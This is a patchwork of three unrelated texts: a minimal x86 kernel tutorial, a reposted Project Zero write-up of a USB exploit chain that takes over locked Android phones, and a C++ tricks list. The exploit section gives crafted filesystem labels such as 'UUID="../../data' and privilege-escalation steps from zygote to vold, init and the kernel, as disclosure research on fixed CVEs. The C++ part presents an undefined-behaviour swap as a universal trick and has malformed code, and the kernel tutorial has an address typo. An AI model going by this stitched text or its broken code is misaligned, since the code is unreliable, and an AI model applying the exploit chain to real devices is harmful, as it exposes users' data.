
Source code is available at my Github repository — mkernel

 

The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable. (more explained later)  In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

;;kernel.asm
bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The first instruction bits 32 is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32 bit mode. It is not mandatorily required in our example, however is included here as it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive to set symbols from source code as global. By doing so, the linker knows where the symbol start is; which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is declared elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can awake the CPU from an hltinstruction. So we disable interrupts beforehand using cli instruction. cli is short for clear-interrupts.

We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the beginning of the allocated memory. We use the resb instruction which reserves memory given in bytes. After it, a label is left which will point to the edge of the reserved piece of memory. Just before the kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.

 

The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

/*
*  kernel.c
*/
void kmain(void)
{
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loops clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;
	}

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		++j;
		i = i + 2;
	}
	return;
}

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory mapped input/output for the screen starts at 0xb8000 and supports 25 lines, each line contain 80 ascii characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to.  The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color.

To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte.
0 represents black background and 2 represents green foreground.

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.

 

In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.

In the first while loop, the program writes the blank character with 0x07 attribute all over the 80 columns of the 25 lines. This thus clears the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.

 

The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

/*
*  link.ld
*/
OUTPUT_FORMAT(elf32-i386)
ENTRY(start)
SECTIONS
 {
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }
 }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that kernel’s code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have look at the next line .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter will become
0x1000000 + the size of the text output section.

Similarly, the data and bss sections are merged and placed at the then values of location-counter.

 

Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a boot loader; called as Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as Multiboot header) within its first 8 KiloBytes.

Further, This Multiboot header must contain 3 fields that are 4 byte aligned namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero.

So our kernel.asm will become:

;;kernel.asm

;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The dd defines a double word of size 4 bytes.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link it using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The ’-c ’ option makes sure that after compiling, linking doesn’t implicitly happen.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.

 

Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro

 

Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you’ll get a list selection with the name of your kernel listed.

Select it and you should see:

image

That’s your kernel!!

 

PS:

* It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking. * To run this on grub2 which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro
}

 

* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

( origin  by Jann Horn, Google Project Zero )

Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).

 

After an Android phone has been unlocked once on boot (on newer devices, using the «Unlock for all features and data» screen; on older devices, using the «To start Android, enter your password» screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.
(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)

 

The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 («directory traversal over USB via injection in blkid output»)
https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 («privesc zygote->init; chain from USB»)

 

These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).

The attack surface

Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn’t necessarily complete):

 

  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

 

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel’s filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold(one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.

 

The bug (part 1): Determining partition attributes

When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.

 

To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:

 

/dev/block/sda1: LABEL=»<label>» UUID=»<uuid>» TYPE=»<type>»

 

However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid’s output only scanned for the first occurrences of UUID=» and TYPE=». Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.

The bug (part 2): Mounting the filesystem

When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel’s vfat filesystem implementation should be able to mount,PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:

 

   if (mFsType != «vfat») {
       LOG(ERROR) << getId() << » unsupported filesystem » << mFsType;
       return -EIO;
   }
   if (vfat::Check(mDevPath)) {
       LOG(ERROR) << getId() << » failed filesystem check»;
       return -EIO;
   }
   // Use UUID as stable name, if available
   std::string stableName = getId();
   if (!mFsUuid.empty()) {
       stableName = mFsUuid;
   }
   mRawPath = StringPrintf(«/mnt/media_rw/%s», stableName.c_str());
   […]
   if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
       PLOG(ERROR) << getId() << » failed to create mount points»;
       return -errno;
   }
   if (vfat::Mount(mDevPath, mRawPath, false, false, false,
           AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
       PLOG(ERROR) << getId() << » failed to mount » << mDevPath;
       return -EIO;
   }

 

The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.

 

This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is ‘UUID=»../##’ into a locked phone, the phone will mount that USB stick to /mnt/##.

 

However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:

 

  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes ‘UUID=»‘ to start the injection, which leaves only five characters for the directory traversal — insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mountonpermission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won’t be permitted to actually interact with the filesystem — for example, the zygote and system_server aren’t allowed to do so. On top of that, processes that don’t have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section «Dealing with SELinux: Triggering the bug twice» describes how these restrictions can be avoided in the context of this specific bug.

Exploitation: Chameleonic USB mass storage

As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you’d then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn’t require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time,blkid also performs some sanity checks on superblocks, the PoC takes a different route.

 

After blkid has read parts of the filesystem and used them to determine the filesystem’s type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.

 

A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.

 

This is relatively simple to implement in practice thanks to Linux’ built-in support for device-side USB.Andrzej Pietrasiewicz’s talk «Make your own USB gadget» is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.

 

The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn’t add unwanted caching.

 

At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted,com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string ‘UUID=»../../data’), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.

 

However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.

Dealing with SELinux: Triggering the bug twice

The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.

 

vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.
A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at/data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.

 

As an attacker, it normally shouldn’t be possible to mount an ext4 filesystem this way because phones aren’t usually set up with any such keys; and even if there is such a key, you’d still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn’t entirely correct — actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)

 

Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.

 

In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem — including mapping them with PROT_EXEC.

Injecting into zygote

The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.

 

When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable/system partition; only the art file is actually stored on /data. But we can instead makesystem@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with__attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.

 

The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.

 

When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the «Unlock for all features and data» prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running «ls /sdcard» on the device.

 

This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.

 

Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn’t immediately fall over — while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.
After some experimentation, it turned out that Android’s code for tracking bandwidth usage has a safety check: If the network usage tracking code can’t write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.

 

To create a network connection, there are two options:

 

  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn’t work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

 

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you’d probably want to use an ethernet connection.

 

At this point, we can run arbitrary native code in zygote context and access user data; but we can’t yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would’ve been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we’ll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMINcapability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting theNO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:

 

  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 — which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn’t work if the root filesystem is a rootfs filesystem. This is the technique used here.

 

In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers/system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux labelu:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):

 

domain_auto_trans(domain, crash_dump_exec, crash_dump);

 

At the time this bug was reported, the crash_dump domain had the following SELinux policy:

 

[…]
allow crash_dump {
 domain
 -init
 -crash_dump
 -keystore
 -logd
}:process { ptrace signal sigchld sigstop sigkill };
[…]
r_dir_file(crash_dump, domain)
[…]

 

This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take overvold.

 

Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, andcrash_dump can’t use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code intocrash_dump64, it still wouldn’t be able to leverage that to attack system components because of the UID mismatch.

 

If you’ve been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn’t work because vold — very sensibly — hardcodes theMS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).

 

To inject code into crash_dump64, we can create a new mount namespace with unshare() (using ourCAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers ofcrash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.

 

At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android’s security policy considers us to have kernel-equivalent privileges; however, to see what you’d have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn’t look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:

 

domain_auto_trans(kernel, init_exec, init)

 

This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn’t mounted with MS_NOSUID, then our file will be executed in init context.

 

The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called «usermode helpers» that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, …) to userspace code. In particular, when a nonexistent key is looked up (e.g. viarequest_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.

 

Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then callrequest_key(), and the kernel invokes our request-key in init context.

 

The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):

 

domain_trans(init, { rootfs toolbox_exec }, modprobe)
domain_trans(init, vendor_toolbox_exec, vendor_modprobe)

 

modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:

 

allow modprobe self:capability sys_module;
allow modprobe { system_file }:system module_load;
allow vendor_modprobe self:capability sys_module;
allow vendor_modprobe { vendor_file }:system module_load;

 

Android nowadays doesn’t require signatures for kernel modules:

 

walleye:/ # zcat /proc/config.gz | grep MODULE
CONFIG_MODULES_USE_ELF_RELA=y
CONFIG_MODULES=y
# CONFIG_MODULE_FORCE_LOAD is not set
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y
CONFIG_MODULE_SRCVERSION_ALL=y
# CONFIG_MODULE_SIG is not set
# CONFIG_MODULE_COMPRESS is not set
CONFIG_MODULES_TREE_LOOKUP=y
CONFIG_ARM64_MODULE_CMODEL_LARGE=y
CONFIG_ARM64_MODULE_PLTS=y
CONFIG_RANDOMIZE_MODULE_REGION_FULL=y
CONFIG_DEBUG_SET_MODULE_RONX=y

 

Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.

Lessons learned

Notably, this attack crosses two weakly-enforced security boundaries: The boundary from blkid_untrusted tovold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote’s CAP_SYS_ADMINcapability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn’t, a security boundary — but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use — for example, as a development aid while stronger isolation is in development -, but they can also have negative effects by obfuscating how important a component is for the security of the overall system.

In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.

What are some fun C++ tricks

This one applies to all languages so far:

a=a+b-(b=a);

A REALLY fast way of swaping a and b.

#include <iostream>
#include <string>

using namespace std;

int main (int argc, char*argv) {
float a; cout << «A:»; cin >> a;
float b; cout << «B:» ; cin >> b;

cout << «———————» << endl;
cout << «A=» << a << «, B=» << b << endl;
a=a+b-(b=a);
cout << «A=» << a << «, B=» << b << endl;
exit(0);
}


void Send(int * to, const int* from, const int count)

{

   int n = (count+7) / 8;

   switch(count%8)

   {

      case 0:

         do

            {

               *to++ = *from++;

      case 7:

               *to++ = *from++;

      case 6:

               *to++ = *from++;

      case 5:

               *to++ = *from++;

      case 4:

               *to++ = *from++;

      case 3:

               *to++ = *from++;

      case 2:

               *to++ = *from++;

      case 1:

               *to++ = *from++;

              } while (—n>0);

    }

}


Preprocessor Tricks

The arraysize macro used in Chrome’s source:

  1. template <typename T, size_t N>
  2. char (&ArraySizeHelper(T (&array)[N]))[N];
  3. #define arraysize(array) (sizeof(ArraySizeHelper(array)))

This is better than the ordinary sizeof(array)/sizeof(array[0]) because it raises compilation errors when the passed in array is just a pointer, or a null pointer whereas the simpler macro silently returns a useless value. For a detailed example, see PVS-Studio vs Chromium.

Predefined Macros:

  1. #define expect(expr) if(!expr) cerr << «Assertion « << #expr \
  2. » failed at « << __FILE__ << «:» << __LINE__ << endl;
  3. #define stringify(x) #x
  4. #define tostring(x) stringify(x)
  5. #define MAGIC_CONSTANT 314159
  6. cout << «Value of MAGIC_CONSTANT=» << tostring(MAGIC_CONSTANT);

The tostring macro is a common trick used to expand macro values inside other macros. The Linux kernel uses a lot of macro tricks.

Using iterators for quickly dumping the contents of a container:

  1. #define dbg(v) copy(v.begin(), v.end(), ostream_iterator<typeof(*v.begin())>(cout, » «))

Sadly, this doesn’t work for pair types so maps are out of scope.

Template Voodoo

Recursion:You can specialize your class templates for certain cases, so you can write down the base-case of a recursion and then define the generic template as a recursive combination of base cases.
For example, the following code calculates the values of the Choose function at compile time:

  1. template<unsigned n, unsigned r>
  2. struct Choose {
  3. enum {value = (n * Choose<n1, r1>::value) / r};
  4. };
  5. template<unsigned n>
  6. struct Choose<n, 0> {
  7. enum {value = 1};
  8. };
  9. int main() {
  10. // Prints 56
  11. cout << Choose<8, 3>::value;
  12. // Compile time values can be used as array sizes
  13. int x[Choose<25, 3>::value];
  14. }

More interesting examples at C++ Programming/Templates/Template Meta-Programming

Mostly Painless Memory Management and RAII

With certain restrictions, you can create templates for «smart» pointers that automatically deallocate resources when they go out of scope or reference count goes to 0. This is basically done by overloading operator * and operator =. Based on your use case, you can transfer ownership when the operator = is used, or update reference counts.
See Smart Pointer Guidelines — The Chromium Projects and http://code.google.com/searchfra…

Argument-dependent name lookup aka Koenig lookup

When a function call cannot be matched to a name in the current namespace, other namespaces can be searched for a matching signature. This is why std::cout << "Hi"; works even though operator << is defined in the stdnamespace.
See Argument-dependent name lookup


auto keyword
In C++ you can use auto to iterate over map,vector,set,..etc which specifies that the type of the variable that is being declared will be automatically deduced from its initializer or for functions it will the return type or it will be deduced from its return statements
So instead of :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (vector<int>::iterator it = vs.begin(); it != vs.end(); ++it)
  4. cout << *it << ‘ ‘;cout<<‘\n’;

just use :

  1. vector<int> vs;
  2. vs.push_back(4),vs.push_back(7),vs.push_back(9),vs.push_back(10);
  3. for (auto it: vs)
  4. cout << it << ‘ ‘;cout<<endl;
